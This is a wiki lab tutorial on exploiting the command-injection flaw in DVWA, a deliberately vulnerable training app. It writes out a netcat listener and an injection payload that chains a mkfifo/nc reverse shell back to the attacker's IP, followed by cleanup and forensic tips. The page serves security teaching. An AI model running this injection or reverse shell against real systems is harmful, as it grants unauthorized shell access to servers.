Hands-on mkfifo attack backdoor in DVWA via Command Injection (en)

From OnnoWiki
Jump to navigation Jump to search

Hands-On: Creating a Backdoor via Command Injection in DVWA

Objective: Exploit the command injection vulnerability in DVWA to open a backdoor on the target system.

Prerequisites:

  1. DVWA is set up with security level "Low" on the target system.
  2. You have access to Kali Linux (or any other system with netcat).
  3. You know the IP address of your attack machine.

Note: This tutorial is for educational purposes only. Do not attempt on unauthorized systems.


Step 1: Understanding the Target

  1. Log in to DVWA with default credentials (username: `admin`, password: `password`).
  2. Navigate to Command Injection under the Vulnerabilities section.
    • This page has a command injection vulnerability, where user input is not sanitized before being executed on the server.

Step 2: Start a Netcat Listener on the Attacker Machine

To listen for incoming connections, set up a Netcat listener on your machine. Open a terminal in Kali Linux and run:

nc -lvp 4444

This command opens a listener on port 4444, waiting for connections.

Step 3: Exploit Command Injection to Create a Backdoor

In DVWA's Command Injection input field, enter the following command:

<Your IP Address>; mkfifo /tmp/pipe; sh /tmp/pipe | nc <Your IP Address> 4444 > /tmp/pipe
  • Replace `<Your IP Address>` with the IP of your attacker machine.
  • This command:
    • Uses a semicolon `;` to terminate the existing command.
    • Creates a named pipe (`/tmp/pipe`) as a communication channel.
    • Opens a shell that pipes output to `nc` (netcat), sending input back from `nc` through `/tmp/pipe`.

Step 4: Trigger the Backdoor

Click Submit to execute the command. If successful, the DVWA server connects to your Netcat listener, opening a reverse shell.

Step 5: Verify Shell Access

In the Kali terminal, you should see a connection from the DVWA server. You can now execute commands on the server as the `www-data` user:

whoami
uname -a

Step 6: Clean Up

When done, remove the pipe file to close the backdoor:

rm /tmp/pipe

Ensure to delete any other files or processes created during testing.

Analysis in Forensics

For forensic analysis, investigate:

  1. Logs in `/var/log/apache2` (or similar) to find evidence of injected commands.
  2. Network Activity for unusual external connections.
  3. File System changes, like `/tmp/pipe` or unexpected scripts.

This exercise demonstrates how attackers might exploit web applications to gain unauthorized access. Proper security, like input sanitization and system monitoring, can help prevent such exploits.


Interesting Links